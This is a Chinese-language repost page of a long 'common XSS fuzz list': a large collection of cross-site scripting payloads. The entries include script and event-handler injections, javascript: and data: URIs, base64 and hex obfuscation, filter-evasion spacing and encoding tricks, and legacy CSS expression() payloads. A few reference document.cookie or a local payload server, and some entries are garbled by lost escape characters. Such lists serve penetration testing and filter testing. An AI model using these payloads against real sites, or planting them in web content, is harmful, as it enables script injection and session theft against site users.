常用xss fuzz 列表
Posted had3s
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了常用xss fuzz 列表相关的知识,希望对你有一定的参考价值。
-alert(1)- |
-prompt(1)- |
<marquee/onstart=confirm(1)> |
javascript:confirm(1) |
javascript:confirm(1); |
javascript:alert(1) |
javascript:alert(1); |
avascript:alert(1) |
javaSCRIPT:alert(1) |
JaVaScRipT:alert(1) |
javas	cript:u0061lert(1); |
javascript:u0061lert(1) |
javascript:alert(document.cookie) |
vbscript:alert(1); |
vbscript:alert(1); |
vbscr	ipt:alert(1)" |
‘‘;!--"<KCF>=&{()} |
<SCRIPT>+alert("KCF");</SCRIPT> |
<SCRIPT>+alert("KCF")</SCRIPT> |
<script>alert(1)</script> |
<script>alert(/KCF/)</script> |
‘ ‘><script>alert(1)</script> |
‘‘><script>alert(1)</script> |
<svg><script>varmyvar="text";alert(1)//";</script></svg> |
???script?alert(1)?/script? |
</script><script>alert(1)</script> |
<a href="j&#x26#x41;vascript:alert%252831337%2529">KCF</a> |
<scrx00ipt>confirm(1);</scrx00ipt> |
<svg/onload=prompt(1);> |
<svg><script>alert(/1/)</script> |
<isindex action="javas	cript:alert(1)" type=image> |
<form action=‘data:text/html,<script>alert(1)</script>‘><button>CLICK |
<form action=‘java	scri	pt:alert(1)‘><button>CLICK |
<form action=javascript
:alert(1)><input type=submit> |
<form action="javas	cript:alert(1)" method="get"><input type="submit" value="Submit"></form> |
<form action="	javas	cript	:alert(‘KCF :)‘)" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form> |
<form id="myform" value="" action=javascript	:eval(document.getElementById(‘myform‘).elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form> |
‘">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext></|><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/KCF/) type=submit>‘-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>‘"><img src="http://127.0.0.1:3555/xss_serve_payloads/kcf.jpg"> |
<script>var url = "<!--<script>";//</script>alert(1)</script> |
<form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript	:eval(document.getElementById(‘myform‘).elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form> |
<iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>"> |
<svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70))) |
<img/src=‘http://127.0.0.1:3555/xss_serve_payloads/kcf.jpg‘ onmouseover=	prompt(1) |
<svg><script>alert( 1) |
<embed/src=//goo.gl/nlX0P> |
<object/data=//goo.gl/nlX0P> |
<iframesrc="javascript:alert(2)"> |
<iframe/src="data:text/html;	base64
,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="> |
<isindexformaction="javascript:alert(1)" type=image> |
<input type="image" formaction=JaVaScript:alert(0)> |
<form><button formaction=javascript:alert(1)>CLICKME |
<form action="Javascript:alert(1)"><input type=submit> |
<isindex action="javascript:alert(1)" type=image> |
<isindex action=j	a	vas	c	r	ipt:alert(1) type=image> |
<isindex action=data:text/html, type=image> |
“/><marquee onfinish=confirm(1)>a</marquee> |
<object data=‘data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>‘> |
<img src= "a" onerror= ‘eval(atob("cHJvbXB0KDEpOw=="))‘ |
<script>alert(‘KCF‘)</script>=a |
<script>document.write(toStaticHTML("<style>div{font-family:rgb(‘0,0,0)‘‘‘}foo‘);color=expression(alert(1));{}</style><div>POC</div>"))</script> |
‘;!--"<XSS><script>alert(1);</script>={()} |
<script>document.body.innerHTML="<a onmouseover%0B=location=‘x6Ax61x76x61x53x43x52x49x50x54x26x63x6Fx6Cx6Fx6Ex3Bx61x6Cx65x72x74x26x6Cx70x61x72x3Bx31x26x72x70x61x72x3B‘><input name=attributes>";</script> |
asfunction:getURL,javascript:alert(1)// |
\%22))}catch(e){}if(!self.a)self.a=!alert(1)// |
"]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;// |
0%5C"))%7Dcatch(e)%7Bif(!window.x)%7Bwindow.x=1;alert(1)%7D%7D// |
<button/onclick=alert(1) >KCF</button> |
<a onmouseover=(alert(1))>KCF</a> |
<p/onmouseover=javascript:alert(1); >KCF</p> |
<article xmlns="><img src=x onerror=alert(1)"></article> |
<article xmlns="x:img src=x onerror=alert(1) "> |
<p style="font-family:‘223bx:expression(alert(1))/*‘"> |
<svg><style><img src=x onerror=alert(1)></svg> |
<listing><img src=x onerror=alert(1)></listing> |
"onmouseover=alert(1);a=" |
‘+alert(1)&&null==‘ |
+alert(1)&&null==‘ |
\‘><script>1<\/script> |
\‘><body onload=\‘1\‘> |
"><script>1<\/script> |
><script>1<\/script> |
"><body onload="1"> |
<img src="x:kcf" onerror="alert(1)"> |
<img src=a onerror=alert(1) |
<script>alert(‘1‘)</script> |
<script>alert(‘\\1\\‘)</script> |
<script>alert(‘\/\1\/\‘)</script> |
‘‘"> |
<scri%00pt>alert(1);</scri%00pt> |
<scrix00pt>alert(1);</scri%00pt> |
<s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t> |
<script>alert(1);</script> |
<%0ascript>alert(1);</script> |
<%0bscript>alert(1);</script> |
<!--[if]><script>alert(1)</script --> |
<SCRIPT> alert("1");</SCRIPT> |
<SCRIPT> alert("1")</SCRIPT> |
<script>alert([!![]] [])</script> |
<var onmouseover="prompt(1)">KCF</var> |
%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80? |
<input type="text" value=``<div/onmouseover=‘alert(1)‘>X</div> |
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ? |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>? |
<embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>? |
<script>~‘u0061‘ ; u0074u0068u0072u006Fu0077 ~ u0074u0068u0069u0073. u0061u006Cu0065u0072u0074(~‘u0061‘)</script U+ |
<script/src=data:text/ju0061vu0061script,u0061%6C%65%72%74(/KCF/)></script ???????????? |
<script itworksinallbrowsers>/*<script* */alert(1)</script ? |
<img src ?itworksonchrome?/onerror = alert(1)??? |
<meta http-equiv="refresh" content="0; url=data:text/html;blabla,<script>alert(1)</script>"> |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe |
<script/src=data:text/javascript,alert(1)></script> ? |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? |
"><img src=x onerror=window.open(‘http://127.0.0.1:3555/xss_serve_payloads/kcf.html"‘);> |
<table background=javascript:alert(1)></table> |
<object/data=//127.0.0.1:3555/xss_serve_payloads/flash.swf |
<applet code="javascript:confirm(1);"> |
<marquee/onstart=confirm(2)>/ |
<body onload=prompt(1);> |
<select autofocus onfocus=alert(1)> |
<textarea autofocus onfocus=alert(1)> |
<keygen autofocus onfocus=alert(1)> |
<video><source onerror="javascript:alert(1)"> |
<a onmouseover="javascript:window.onerror=alert;throw 1> |
<img src=x onerror="javascript:window.onerror=alert;throw 1"> |
<body/onload=javascript:window.onerror=eval;throw‘=alertx281x29‘; |
<img style="xss:expression(alert(1))"> |
<div style="color:rgb(‘‘�x:expression(alert(1))"></div> |
<a onmouseover=location=’javascript:alert(1)>click |
<body onfocus="location=‘javascrpt:alert(1) >123 |
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/> |
<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(1)//"></svg> |
<meta content="
 1 
;JAVASCRIPT: alert(1)" http-equiv="refresh"/> |
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:u0061lert(1);"></g></svg> |
<style>#test{x:expression(alert(/KCF/))}</style> |
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>? |
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"> |
eval("s=document.createElement(‘script‘);alert(1);document.getElementsByTagName(‘head‘)[0].appendChild(s)") |
"><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/kcf.html" |
"><meta http-equiv="refresh" content="0;url=http://127.0.0.1:3555/xss_serve_payloads/kcf.html"> |
javascript:/*–></marquee></script></title></textarea></noscript></style></xmp>”> [img=1]<img -/style=-=expression(/*’/-/*‘,/**/eval(name)//);wi dth:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript :eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>”"/> |
<img src=”<img src=x”/onerror=alert(1)//”> Jquery: <img/src/onerror=alert(1)> |
<input id=x><input id=x><script>alert(x)</script> |
<a href="invalid:1" id=x name=y>test</a><a href="invalid:2" id=x name=y>test</a><script>alert(x.y[0])</script> |
<script>alert(x.y.x.y.x.y[0]);alert(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script> |
<a href=1 name=x>test</a><a href=1 name=x>test</a><script>alert(x.removeChild)alert(x.parentNode)</script> |
<a href="123" id=x>test</a><script>x=‘javascript:alert(1)‘;</script> |
<form name=self location="javascript:alert(1)"></form><script>if(top!=self){top.location=self.location}</script> |
<form name=self location="javascript&#58;alert(1)"></form><script>if(top!=self){top.location=self.location}</script> |
%3Cimg%20name%3DgetElementsByTagName%20src%3D1%20%20onerror%3Dalert(1)%3E |
%3Cform%20onmouseover%3Dalert(1)%3E%3Cinput%20name%3Dattributes%3E |
<a/onmouseover[x0b]=location=‘x6Ax61x76x61x73x63x72x69x70x74x3Ax61x6Cx65x72x74x28x31x29x3B‘>KCF |
data:text/html,%3Cscript%3Ealert(1)%3C%2Fscript%3E |
window.name//‘name="javascript:alert("KCF") |
<svg/onload=location=/java/.source+/script/.source+location.h ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:() |
<%div%20style=xss:expression(prompt(1))> |
%22]);}catch(e){}if(!self.a)self.a=!alert(1);/ |
<script>alert(1)</script>; |
<script>alert("/KCF"/)</script> |
<SCRIPT>a=/KCF/ alert(1);</SCRIPT> |
<script>alert([!![]]+[])</script> |
<script>prompt(-[])</script> |
<scr/**/ipt>alert(1)</sc/**/ipt> |
#<script>alert(1)</script> |
‘><script>KCF</script> |
‘><body onload=‘KCF‘> |
"><script>KCF</script> |
><script>KCF</script> |
"><body onload="KCF"> |
<img src="x:kcf" onerror="alert(1)"> |
<img src=a onerror=alert(1)%0A>a |
onmouseover=alert(1); |
<<SCRIPT>alert(1);/ |
<SCRIPT>a=/kcf/ |
alert(1) |
alert(String.fromCharCode(49)) |
alert(/1/.source) |
eval(‘alert(1)‘) |
this[‘EvAL‘.toLowerCase()](‘aLErT(1)‘.toLowerCase()) |
(alert(1)).replace(/.+/,eval); |
u0061u006cu0065u0072u0074(1) |
eval(‘u00‘ + ‘6‘ + ‘1‘+‘le‘ + ‘u0072‘ + ‘t(1)‘) |
eval(‘141154145162164506151‘) |
eval(‘x61x6cx65x72x74(1)‘) |
eval(‘x61lerx74(1)‘) |
top[‘ax6Cert‘](1) |
x=‘x61x6cx65x72x74x28x31x29‘;new Function(x)() |
setTimeout(‘alert(1)‘,0) |
setTimeout(u0061u006cu0065u0072u0074(1),0); |
onerror=eval;throw‘alertx281x29‘; |
expression(URL=0) |
expr65 ssion(URL=0) |
expr65 ss/*???*/ion(URL=0); |
expression28URL=029 |
expr65 ss/*%/ion28URL=029 |